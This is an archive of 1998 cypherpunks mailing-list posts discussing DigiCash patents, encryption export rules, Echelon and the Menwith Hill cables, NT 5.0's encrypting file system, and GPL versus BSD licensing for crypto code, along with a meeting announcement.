Q29tbWVudDogUHJvY2Vzc2VkIGJ5IE1haWxjcnlwdCAzLjQsIGFuIEVtYWNz
L1BHUCBpbnRlcmZhY2UKCmlRQ1ZBd1VCTmh0QnhoSWU5MVViOERjRkFRSGpK
Z1A3QkRRQUJWdkt5czhsM1JXNXFmcDRES0Vnai9mZGxzQysKZzFvaXdkdkJ4
NDJIeUVESy81TUtQaDFKNGRBREo0K1BOUEFyQTMyQVRaakpVNWpGTHhxS2Rh
bVpiSDZmYm5lagp5cDVzVCttbzF1Z0pzaHB1dGEzbWZGSkVkMjd3UURQNmxo
K2hJWVVLL2lTOTkzRllZUDNMYW9DbGErWG9pa0U0Ckp2dFM3Y0swTE5FPQo9
Tys2SAotLS0tLUVORCBQR1AgTUVTU0FHRS0tLS0tCg==
--Boundary..3997.1071713808.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 6 Oct 1998 21:16:10 +0800
To: "Enzo Michelangeli" <cypherpunks@cyberpass.net>
Subject: Re: Sad news ... (... or not ;-))
In-Reply-To: <01c201bdf1c9$bbd28b20$87004bca@home>
Message-ID: <v0401176cb240f9140fbf@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:08 AM -0400 on 10/7/98, Enzo Michelangeli wrote:

> But if the patents were held by Digicash Inc., what was the point of having
> Digicash BV?

Ah. But they weren't originally. Originally, the patents were held by David
Chaum, and licensed to DigiCash, BV. When they finally ran out of investors
in DigiCash BV, an investor group headed by Nicholas Negroponte said they'd
invest in a new company, domiciled in the US, but only if Chaum signed his
rights over to the US company.

Having just written that, it starts to make somewhat convoluted sense. Buy
the Dutch company from the shareholders for some small sum, pay most of the
"real" creditors, roll it up, making the investors  and some of the
creditors (wanna bet they're software contractors?) take the hit for what's
left, and start the new company in the US with, technically, a clean
financial slate -- and control of the patent.

Curioser and curioser. Makes me wonder, though, whether after all this
financial prestidigitation they're going to have any room left for jello.
:-).

Cheers,
Bob Hettinga

-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Thu, 8 Oct 1998 01:29:02 +0800
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Web TV with 128b exported
In-Reply-To: <3.0.5.32.19981006110801.0088a430@m7.sprynet.com>
Message-ID: <3.0.5.32.19981007090445.008903c0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:32 PM 10/6/98 -0500, William H. Geiger III wrote:
>   at 11:08 AM, David Honig <honig@sprynet.com> said:
>>The WebTV(TM) Network service, combined with the WebTV-based Internet
>>terminals and receivers, is the first communications system permitted by
>>the U.S. government to provide strong encryption for general use by
>>non-U.S. citizens in Japan and the United Kingdom. Such strong encryption
>>allows Japanese and United Kingdom subscribers of WebTV to communicate
>>through the WebTV Network (both within national borders and
>>internationally) without fear of interception by unauthorized parties. 
>
>I have my doubts on this. I find it highly unlikely that the FEDs would
>approve this without some form of GAK built in even if it is not in the
>form of "key recovery".
>

I'd guess that the Export control puppets know that the Web-TV hubs will
be subpoena-able by the US even in these other "sovereign" nations.
The WebTV centralized infrastructure makes this easy.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 7 Oct 1998 22:54:09 +0800
To: cypherpunks@toad.com
Subject: American Justice Threat List
Message-ID: <199810071434.KAA07440@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Some of the Justice/FBI Wish List legislative requests,
outlined by Rep. Bob Barr a few days ago, are being
implemented in two recent docs:

1. House/Senate Conference Report on HR3694, 
Intelligence Authorization Act for FY 1999:

   http://jya.com/hr105-780.txt  (108K)

An excerpt from this report, Foreign Intelligence and
International Terrorism Investigations, describes 
expanded wiretap and encryption provisions:

   http://jya.com/fiiti.htm  (36K)

Note the planned use of "volunteers" to assist Justice
with encryption and other features added to original bills
by the House/Senate conference, in line with Barr's
prediction.

2. The International Crime and Anti-Terrorism
Amendments for 1998, expands foreign action
powers, broadens seizures and other provisions:

   http://jya.com/s2536.txt  (38K)

What these confirm is the use of the threat of terrorism
to rapidly eliminate the separation between foreign and 
domestic intelligence, military and law enforcement 
powers.

While still mostly aimed at foreign-originated threats,
the provisions now make it possible to turn the full
kennel of the dogs of war loose on disobedient US 
citizens lumped with foreigners impossible to 
understand except as threats to American Justice.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 7 Oct 1998 23:05:00 +0800
To: cypherpunks@toad.com
Subject: Nowhere Justice
Message-ID: <199810071447.KAA16769@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



A distinguishing feature of the complaints and indictments
of suspects in the African Embassy bombings is the
use of the phrase "in the special maritime and territorial
jurisdiction of the United States, as that term is defined in
Title 18, United States Code, Section 7(3), and outside 
the jurisdiction of any particular state or jurisdiction," to 
apparently lay claim to the legal right of the US to arrest 
and imprison terrorist suspects for acts in any location 
where US law customarily would not be valid:

   http://jya.com/alqfiles.htm

Would any of our legal advisors know the origin of that 
phrase "outside the jurisdiction of any particular state or 
jurisdiction?" Is this new, and devised to reduce conflict
with other states who may harbor terrorists, or perhaps
prevent them from being terrorist targets for cooperating
with the US?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jennifer Stinson-- BDSI <jstinson@trip.net>
Date: Thu, 8 Oct 1998 00:15:09 +0800
To: cypherpunks@einstein.ssz.com
Subject: 1999 San Antonio/Austin Guide to Business Technology
Message-ID: <eaep.3.0.reg.LarVSQ.36075.4590460648@mail.trip.net>
MIME-Version: 1.0
Content-Type: text/plain



Prospective Buyers are Asking for Information about Your Products and Services

Let them know that your company is local and can supply what they need by participating in the 
1999 Guide to Business Technology.  The Guide is an annual publication that is distributed to local 
and regional companies giving them useful buying information about services and products such as:

*  Cellular  *  Computer Hardware  *  Computer Networking  *  Computer Software  *  Computer 
Telephony Interface  *  Consulting  *  Emerging Technology  *  Internet Access *  Intenet Marketing  
*  Outsourcing  *  Software Development  *  Video Conferencing  *  Wireless Communications  *  Y2K

I am contacting you, because you were listed in the search engines as having products and services 
tht fit the needs of the prospective buyers we contacted.

To get more information, go to:  http://www.biztech99.com

or email:  jstinson@trip.net

**Note you will only receive this message once, this is not a list, you do not need to respond with 
"remove"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Tue, 6 Oct 1998 08:33:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Echelon's Origin
Message-ID: <90771266316475@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



John Young <jya@pipeline.com> writes:

>The NSA released during the summer a Top Secret memorandum by Truman in 
>1952 establishing NSA as the lead COMINT agency for the USG:

Located nearby at http://www.nsa.gov:8080/docs/efoia/released/jfk.html are 
documents related to the Kennedy assassination.  Check out the COMINT 
reports, they were getting information from an awful lot of interesting 
sources, many of which appear to be telegrams or telexes or similar
communications.  The Truman memo may show the background behind Echelon,
but these things show it (or at least its ancestor) in action.  Wow.

Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 8 Oct 1998 02:02:08 +0800
To: David Honig <honig@sprynet.com>
Subject: Re: Web TV with 128b exported
In-Reply-To: <3.0.5.32.19981007090445.008903c0@m7.sprynet.com>
Message-ID: <199810071745.NAA13386@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.5.32.19981007090445.008903c0@m7.sprynet.com>, on 10/07/98 
   at 09:04 AM, David Honig <honig@sprynet.com> said:

>At 04:32 PM 10/6/98 -0500, William H. Geiger III wrote:
>>   at 11:08 AM, David Honig <honig@sprynet.com> said:
>>>The WebTV(TM) Network service, combined with the WebTV-based Internet
>>>terminals and receivers, is the first communications system permitted by
>>>the U.S. government to provide strong encryption for general use by
>>>non-U.S. citizens in Japan and the United Kingdom. Such strong encryption
>>>allows Japanese and United Kingdom subscribers of WebTV to communicate
>>>through the WebTV Network (both within national borders and
>>>internationally) without fear of interception by unauthorized parties. 
>>
>>I have my doubts on this. I find it highly unlikely that the FEDs would
>>approve this without some form of GAK built in even if it is not in the
>>form of "key recovery".
>>

>I'd guess that the Export control puppets know that the Web-TV hubs will
>be subpoena-able by the US even in these other "sovereign" nations. The
>WebTV centralized infrastructure makes this easy.

I have never looked at the WebTV set-up but I am assuming they are running
a series of proxy servers which then provide content for the WebTV boxes?
Or are they providing an AOL type of thing, with their own proprietary
network and gateways to the real world?

Exactly what is getting encrypted and what is not in this system? If this
is just point to point encryption between the WebTV box & the WebTV
hub/proxy/whatever it seems rather worthless IMNSHO.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Dogs crawl under gates, software crawls under Windows!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNhuqwo9Co1n+aLhhAQGA8AP/eHyYTMwqVfv07k0nRG3ebWf67Tjw7ObH
UEdBwqdf99pJ6HDhcHxz7iqHWT3FHv1B86UXVO2sf8kuZQrSlWOZAxjwZhqQnXTn
7z7RZNe2MEyere8eujTIv4i1pYLKFgFl5vKj3evz5AaILHp8lYl3IASIzbhcP7Dc
8W94T1RhJgI=
=TvXZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim McCoy" <mccoy@yahoo-inc.com>
Date: Thu, 8 Oct 1998 04:06:20 +0800
To: "Frank O'Dwyer" <rms@gnu.org>
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source   code)
Message-ID: <00cb01bdf22d$6ae0a800$f710fbce@pericles.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain



Frank O'Dwyer writes:
>Agreed. For example, having SSLeay (say) used in some proprietary
>program or other would achieve very little in the way of "cypherpunk
>goals" (unless perhaps the company voluntarily published improvements
>and bug fixes for SSLeay).

Excuse me?  What exactly to you think the "cypherpunk goals" are?  It seems
to me that promoting the adoption of strong crypto by everyone is high on
the list and when we say "everyone" we mean to include the vast majority of
users who are using propriatary and closed-source programs.  That means that
if a proprietary program uses SSLeay or any other crypto library to give the
program strong crypto then the "cypherpunk goals" are being achienved.

I don't give a damn whether the application is "free" or not, I care whether
or not it provides users with good security and privacy.  The relative
freedom of the program (regardless of who is defining the word freedom) is
incidental to the matter.  If Microsoft came out with a statement that they
were going to use SSLeay to provide all users (foreign and domestic) with
strong crypto at all levels of the OS I am quite certain that Eric would be
quite happy with this outcome even though no source would be shared and no
improvements or bug fixes would come back from Redmond.

jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 6 Oct 1998 21:16:36 +0800
To: coderpunks@toad.com
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199810071026.GAA20270@germs.dyn.ml.org>
Message-ID: <361B5A74.332D759E@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Rick Campbell wrote:

> Public Domain status denotes more freedom than GPL.  It allows all of
> the freedom of GPL and in addition, it allows the freedom of making
> proprietary modifications.

Logically this is (trivially) true, since PD imposes no conditions
while GPL imposes some. One possibility I can imagine is that those
who favour GPL and presumably also the ideas behind it could be
a bit more motivated to achieve a better quality of the software 
(including maintenance) than those who put software in the PD.
Of course this is just speculation and I have no way of knowing the 
reality.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@vendorsystems.com>
Date: Thu, 8 Oct 1998 03:55:30 +0800
To: cypherpunks@toad.com
Subject: Re: Web TV with 128b exported
In-Reply-To: <199810062125.RAA26914@domains.invweb.net>
Message-ID: <v03102800b24170b75a4f@[204.1.1.65]>
MIME-Version: 1.0
Content-Type: text/plain



David Honig wrote:

>I'd guess that the Export control puppets know that the Web-TV hubs will
>be subpoena-able by the US even in these other "sovereign" nations.
>The WebTV centralized infrastructure makes this easy.

This announcement seems to be getting a lot of this sort of reaction but I
don't see quite why the news is greeted with such animosity. If a duly
authorized search warrant is required in order to obtain information that
represents a potential world of difference from having unrestricted ability
to monitor all communications.

Steve Bryan
Vendorsystems International
email: sbryan@vendorsystems.com
icq: 5263678
pgp fingerprint: D758 183C 8B79 B28E 6D4C  2653 E476 82E6 DA7C 9AC5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Thu, 8 Oct 1998 02:56:36 +0800
To: cypherpunks@Algebra.COM
Subject: [Fwd: [Spooks] British Telecom-Menwith Hill connection]
Message-ID: <361BB603.6F40C570@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



To: Spooks <spooks@qth.net>
Subject: [Spooks] British Telecom-Menwith Hill connection
From: Bob Margolis <rttyman@wwa.com>
Date: Tue, 06 Oct 1998 23:32:36 -0500
Reply-To: Bob Margolis <rttyman@wwa.com>
Sender: owner-spooks@qth.net

BT condemned for listing cables to US sigint station



     4 September, 1997

     A judge has lambasted BT for revealing detailed information about top secret high capacity cables feeding phone and
     other messages to and from a Yorkshire monitoring base. BT admitted this week that they have connected three digital
     optical fibre cables - capable of carrying more than 100,000 telephone calls at once - to the American intelligence base
     at Menwith Hill, near Harrogate.

     Menwith Hill is run by the US National Security Agency (NSA), which monitors the world's communication for US
     intelligence. NSA acknowledges that "the Hill" is the largest electronic monitoring station in the world. Over 1,200 US
     civilians and servicemen work round the clock at the base, intercepting and analysing communications mainly from
     Europe, Russia and the Middle East.

     Much of the information reaching the base comes from spy satellites. The base has 26 large white golfballs or "radomes"
     for space communications, making it an inescapable landmark in the Yorkshire dales.

     In a courtroom fiasco this week, British Telecom's solicitors first sent documents and a witness to give details of the
     cables to York Crown Court, where two women campaigners were appealing against conviction for trespassing at the
     station. The next day, they sent a second solicitor to attempt to silence their own witness and to withdraw evidence
     already given.

     Judge Jonathan Crabtree agreed to grant public interest immunity "BT had no business whatsoever to disclose anything
     of the kind", he said. He then ordered Mr R.G. Morris, BT's head of emergency planning, not to give any more evidence
     about the secret cables.

     After being privately briefed in his chambers by BT's second solicitor, the judge said that it was immaterial if Menwith
     Hill was spying on British citizens and commercial communications and may have cost British companies in billions of
     dollars of lost sales.

     "The national interest of the United Kingdom, even if if is conducted dishonestly, requires this to be kept
     secret", said Judge Crabtree.

     "The methods of communicating to and from Menwith Hill, whether military intelligence or commercial spying, is clearly
     secret information. The governments of the United States and United Kingdom do not want this information to be
     divulged", he explained.

     But he said that BT's list of secret cables in and out of Menwith Hill could not be withdrawn from the case. "Half the cat
     is out of the bag. The contents of the letter are now in public domain. I just don't know what BT think they were doing",
     he added.

     According to the letter, the Post Office (now BT) first provided two high capacity "wide bandwidth" circuits to Menwith
     Hill in 1975. They were connected on a coaxial cable to the BT network at Hunters Stones, a microwave radio station a
     few miles from the US base.

     During the 1970s and 1980s, almost all Britain's long-distance telephone calls were carried on the microwave network
     of which Hunters Stones is part. The existence of the cables connecting the network to Menwith Hill has been known
     since 1980, but the authorities have always refused to comment. BT now claims that the cables were connected directly
     to the United States via undersea cable, and did not link to other parts of the British system.

     The system was upgraded in 1992, says BT, when a new high capacity optical fibre cable was installed. This linked to a
     different part of the BT network, but was also carried directly to the United States via undersea cable. Since then, BT
     revealed, the capacity of the system has been trebled by adding two more optical fibre links. These could carry more
     than 100,000 simultaneous telephone calls.

     Lawyers for the two women campaigners, Helen John and Anne Lee, say they were astonished by the company's
     sudden change of heart. They said that the letter giving details of the cables may have been written for PR purposes, and
     appeared intended to suggest that BT wasn't helping NSA tap telephones. This, BT said, was a "misapprehension which
     is damaging to this company's reputation".

     BT staff also hinted that other British communications companies are supplying tapping capacity to the American base.
     Even as BT's solicitor was seeking to have his evidence prohibited, BT's witness was outside court giving further
     information to the women's solicitor implying that other British communications companies were also involved in the
     spying activities at Menwith Hill. "You should ask me about other companies", he said before he was silenced.

     Tony Benn - who was the Postmaster General at the time cables were first installed connecting Menwith Hill to the
     British communications network - also gave evidence. He said that although a Cabinet minister and privy councillor, he
     had been told nothing of the secret arrangements with the Americans.

     BT were ordered to pay the legal costs caused by their change of heart. The judge accused them of giving away
     confidential commercial information and national secrets. "If I had a burglar alarm system, I would now think twice about
     having it operated by BT", he said.

---
Submissions should be sent to spooks@qth.net
To unsubscribe, send "unsubscribe spooks" to majordomo@qth.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Enzo Michelangeli" <em@who.net>
Date: Tue, 6 Oct 1998 18:09:45 +0800
To: <cypherpunks@cyberpass.net>
Subject: Sad news ... (... or not ;-)) (http://www.inet-one.com/cypherpunks/current/msg
Message-ID: <01c201bdf1c9$bbd28b20$87004bca@home>
MIME-Version: 1.0
Content-Type: text/plain




> At 6:57 PM -0400 on 10/6/98, Petro wrote:>
> >  Who owns the patents, Digicash, or Chaum?>
> DigiCash, Inc., of the US of A, not DigiCash BV, of the Netherlands.>
> Cheers,> Bob Hettinga

Uhm, strange: I thought that the main attraction of a Dutch company was the
lack of withholding tax on royalty payments made to non-residents, that,
combined with the tax treaties between The Netherlands and most countries
(which allow tax-free payment from those countries to the Dutch company),
makes it an ideal vehicle to receive royalties on a (almost) tax-free basis.
But if the patents were held by Digicash Inc., what was the point of having
Digicash BV?

Enzo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Thu, 8 Oct 1998 09:03:23 +0800
To: Steve Dunlop <cypherpunks@cyberpass.net
Subject: Re: NT 5.0 and EFS -- A victory for widespread use of crypto?
Message-ID: <3.0.32.19691231160000.00695644@shell15.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



EFS is being deployed because They realized that with NTFS-readers
available for other OSes besides NT there was no longer even the illusion
of security offered by the NT architecture.  Hence they figured they'd
scramble things up a bit.  It leaves some interesting features OUT ... it
will not Save The World.
 



At 06:06 PM 10/7/98 -0500, Steve Dunlop wrote:
>
>All,
>
>Does anyone have any opinions on the encrypting file
>system (EFS) that is supposed to ship with NT 5.0?
>
>The white paper on the MSDN web site says it uses
>DESX (no explaination as to what the X is) and an
>RSA public key algorithm to store the symmetric keys,
>which are random for each file.
>
>So what's DESX?
>
>EFS appears to have the architecture to support
>arbitrarily long keys although this has been crippled
>in the NT5.0 release, presumably because of
>export limitations.  It has the key recovery features
>you would expect in a commercial product of the
>type; they can be turned off administratively.
>
>Is this a victory for wider use of encryption?
>
>--
>Steve Dunlop
>letters: "dunlop" at "bitstream" dot "net"
>http://www2.bitstream.net/~dunlop
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@sprynet.com>
Date: Fri, 9 Oct 1998 01:17:15 +0800
To: Steve Bryan <cypherpunks@toad.com
Subject: Re: Web TV with 128b exported
In-Reply-To: <3.0.5.32.19981007090445.008903c0@m7.sprynet.com>
Message-ID: <3.0.5.32.19981007161433.008989e0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:39 PM 10/7/98 -0500, Steve Bryan wrote:
>David Honig wrote:
>
>>I'd guess that the Export control puppets know that the Web-TV hubs will
>>be subpoena-able by the US even in these other "sovereign" nations.
>>The WebTV centralized infrastructure makes this easy.
>
>This announcement seems to be getting a lot of this sort of reaction but I
>don't see quite why the news is greeted with such animosity. If a duly
>authorized search warrant is required in order to obtain information that
>represents a potential world of difference from having unrestricted ability
>to monitor all communications.
>
>Steve Bryan

The announcement would be a lot better if foreigners were "permitted"
strong disk
encryption; or if foreigners were "permitted" the high grade anonymity that
packet routing can provide.  

Do you think the US would allow strong crypto WebTV for foreigners if the
foreigners had secure links to an equivalent, independent, foreign WebTV
service whose assets were not readily seized, whose techs were not easily
made into Agents, whose officers were not readily kidnappable by the USDoJ,
etc.

Just think of the cookie recipes the infidels would be circulating..

I really doubt Osama subscribes to WebTV.  :-)








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: landon dyer <landon@best.com>
Date: Thu, 8 Oct 1998 07:56:35 +0800
To: Steve Dunlop <nospam@bitstream.net>
Subject: Re: NT 5.0 and EFS -- A victory for widespread use of crypto?
In-Reply-To: <361BF3ED.8111C033@bitstream.net>
Message-ID: <3.0.3.32.19981007164728.009611c0@shell9.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:06 PM 10/7/98 -0500, you wrote:
>
>Does anyone have any opinions on the encrypting file
>system (EFS) that is supposed to ship with NT 5.0?

  you're asking the *cypherpunks list* if anyone has
an opinion?  oh, gad...  :-)


>EFS appears to have the architecture to support
>arbitrarily long keys although this has been crippled
>in the NT5.0 release, presumably because of
>export limitations.  It has the key recovery features
>you would expect in a commercial product of the
>type; they can be turned off administratively.


  excerpted (without permission) from the latest issue of the
microsoft systems journal, about the new feature of NTFS in
NT 5.0, specifically regarding encryption:

  "...NTFS has built-in recovery support so that the encrypted
   data can be accessed.  In fact, NTFS won't allow files to be
   encrypted unless the system is configured to have at least
   one recovery key.  For a domain environment, the recovery keys
   are defined at the domain controller and are enforced on all
   machines within the domain...."

  i'll definitely have to play with this one -- wh'appens if you add
a machine to a domain, encrypt some files, then remove the machine
from the domain?  can the admin of the domain recover all files
you encrypt from that point on?  and so on...


  "...For home users, NTFS automatically generates recovery keys
   and saves them as machine keys.  You can then use command-line
   tools to recover data from an administrator's account."


  if i were looking for a point of attack, i'd start with the
low-level key management here...


  another interesting thing to try: install NT on a workstation,
encrypt a removable disk, then reinstall NT on that workstation
again -- have you defeated key recovery for that disk?  (since the
machine keys for the first install of NT are presumably gone...)


-landon (re-lurking)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 8 Oct 1998 07:59:27 +0800
To: cypherpunks@cyberpass.net
Subject: ANNOUNCE: SF Bay Cypherpunks Mtg, Sat 10 Oct, Stanford
Message-ID: <v04101f00b241a96f7d1b@[206.169.228.154]>
MIME-Version: 1.0
Content-Type: text/plain



Online version: <http://www.freedomfighter.net/cypherpunks/physical.html>

SF Bay Area Cypherpunks
October 1998  Physical Meeting

General Info:

  Sat 10 Oct
  1:00 - 5:00 PM
  Stanford University Campus (Palo Alto, California)
    - Tressider Union courtyard

   The October Physical Meeting of the San Francisco Bay Area Cypherpunks
   will be held on Saturday 10 October 1998 from 1-5 PM. This is an "Open
   Meeting on US Soil" and, as always, members of the Public are encouraged
   to attend.

Meeting Agenda:

 1:00-2:00
   Informal pre-meeting gathering

 2:00-5:00
   Agenda TBD on-the-fly at the meeting... Some suggestions:

   CIPHR'99 conference announcement
   MacCrypto'98 summary
   Yet Another Snake-Oil cluster-jerk. This month: "JAWS"
   "Software as Speech" discussion
   Review of Bruce Schneier's Review of TriStrata/TESS
   Cypherpunks/GNU/GPL License discussion
   PGP Keysigning session:
    - Bring a printout of your key's fingerprint/keyid/size + photoID
    - Load your key info into your Pilot or Newton for IR beaming

 5:00-?
   Dinner at a nearby restaurant usually follows the meeting.

Featured Speakers:

   (TBD)

Meeting Notes for Oct '98:

   The meeting will be shorter this month, because some cypherpunks were not
   ready to present, technical white-papers were not quite written (Nov) or
   the marketing weasels at a company-that-shall-remain-nameless were too
   scared to show up. ;)

   MacCrypto'98 is being held this week nearby at Apple in Cupertino:
   several out-of-town cypherpunks are lurking. Therefore, it's extremely
   likely that agenda items will arise in realtime, so
   "you must be present to win."

   Because of the loose agenda, the meeting will begin slightly later than
   normal: 1:00 pm pre-meeting (instead of noon), 2:00 pm for the meeting.

   This is probably our last outdoor meeting for 1998.

   Unless I'm mistaken, this is our seven-year anniversary meeting(?).

Location Info:

   The meeting location will be familiar to those who've been to our outdoor
   meetings before, but for those who haven't been, it's on the Stanford
   University campus, at the tables outside Tresidder Union, at the end of
   Santa Theresa, just west of Dinkelspiel Auditorium.
   We meet at the tables on the west side of the building, inside the
   horseshoe "U" formed by Tresidder. Ask anyone on campus where Tressider
   is and they'll help you find it.

   Food and beverages are available at the cafe inside Tressider.

Location Maps:

   Stanford Campus (overview, Tresidder highlighted).

http://www.stanford.edu/home/map/search_map.html?keyword=&ACADEMIC=Tresidder+Uni
on
   Tresidder Union (zoomed detail view).
    http://www.stanford.edu/home/map/stanford_zoom_map.html?234,312
   Printable Stanford Map (407k).
    http://www.stanford.edu/home/visitors/campus_map.pdf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernie B. Terrado" <bbt@peak-two.uplb.edu.ph>
Date: Tue, 6 Oct 1998 20:19:19 +0800
To: cypherpunks@toad.com
Subject: question
Message-ID: <Pine.GSO.3.96.981007180419.18061B-100000@peak-two.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



traceroute, is it effective as ping or finger.
what other info would I have to know about it

@@@@@@@@@@@@@@@@@@@@@@@@@
It's done.....          @
                        @
metaphone@altavista.net @					
@@@@@@@@@@@@@@@@@@@@@@@@@




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Dunlop <nospam@bitstream.net>
Date: Thu, 8 Oct 1998 07:12:14 +0800
To: cypherpunks@cyberpass.net
Subject: NT 5.0 and EFS -- A victory for widespread use of crypto?
Message-ID: <361BF3ED.8111C033@bitstream.net>
MIME-Version: 1.0
Content-Type: text/plain



All,

Does anyone have any opinions on the encrypting file
system (EFS) that is supposed to ship with NT 5.0?

The white paper on the MSDN web site says it uses
DESX (no explaination as to what the X is) and an
RSA public key algorithm to store the symmetric keys,
which are random for each file.

So what's DESX?

EFS appears to have the architecture to support
arbitrarily long keys although this has been crippled
in the NT5.0 release, presumably because of
export limitations.  It has the key recovery features
you would expect in a commercial product of the
type; they can be turned off administratively.

Is this a victory for wider use of encryption?

--
Steve Dunlop
letters: "dunlop" at "bitstream" dot "net"
http://www2.bitstream.net/~dunlop





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Thu, 8 Oct 1998 09:36:08 +0800
To: "Frank O'Dwyer" <fod@brd.ie>
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <361BF06E.164B7CF@brd.ie>
Message-ID: <Pine.SUN.3.91.981007180953.11287B-100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain



[Coderpunks distribution removed].

On Wed, 7 Oct 1998, Frank O'Dwyer wrote:
 
> No, it doesn't, because no crypto library gives any application "strong
> crypto". It has to be used correctly and appropriately for one thing.
> For another, it needs to be free of back doors, whether intentionally
> placed there or otherwise. In the long run, full disclosure of source
> code provides the best assurance that this is so. 

Of course source availablility aids greatly in evaluating the overall 
security of software. However, Jim was correct in pointing out that 
/requirin/g source availability of products by licensing restrictions 
employed in crypto component freeware is 
counterproductive. May companies will not be able to source contaminated 
by GNU-style licensing restrictions. Consequently, alternatives would be 
found. Some of those alternatives, include using no crypto at all or 
using crypto written by somebody that does not understand crytography. 
Hardly the outcome a Cypherpunk would desire.

We should all thank Eric for making SSLeay available under a BSD-style 
license. The world probably would have half as many internationally 
available strong cryptographic products had Eric used GPL.

The bottom line is that GNU-licensing is more restrictive than 
BSD/SSLeay-style licensing. Hence identical freeware will see less 
deployment under GNU than under BSD.

Cyphpunks believe that more strong crypto is better.

The conclusion in the GNU vs. BSD/SSLeay/etc. license debate should be clear.

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 8 Oct 1998 01:17:30 +0800
To: Michael Motyka <cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199810071711.TAA22884@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:07 PM 10/6/98 -0700, Michael Motyka wrote:
>> ITALIAN dignitaries who fear being kidnapped are having
>> microprocessor homing devices planted in their bodies so police can
>> track them down if they are abducted.
>>
>Where can I buy one of these things for my cat? My master password is
>tatooed inside her upper lip.
>

You must either have a large cat or an insecure password.  Or a very
precise veterinary tattooist.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@bigfoot.com>
Date: Thu, 8 Oct 1998 10:17:14 +0800
To: cypherpunks@Algebra.COM
Subject: Echelon @ Menwith Hill [was Re: [Fwd: BT + menwith conn
In-Reply-To: <361BB603.6F40C570@brainlink.com>
Message-ID: <Pine.LNX.4.02.9810071904000.2587-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain




These are some echelon and menwith hill related sites....  though the last
one is the best anti-menwith hill one (and most informitive i think...

http://www.fas.org/irp/facility/menwith.htm
http://www.gn.apc.org/cndyorks/mhs/index.htm
http://www.fas.org/irp/facility/onizuka.htm
http://www.fas.org/irp/facility/index.html
http://www.bsnet.co.uk/chris/nsa.txt
http://www.fas.org/irp/facility/nroceeta.htm
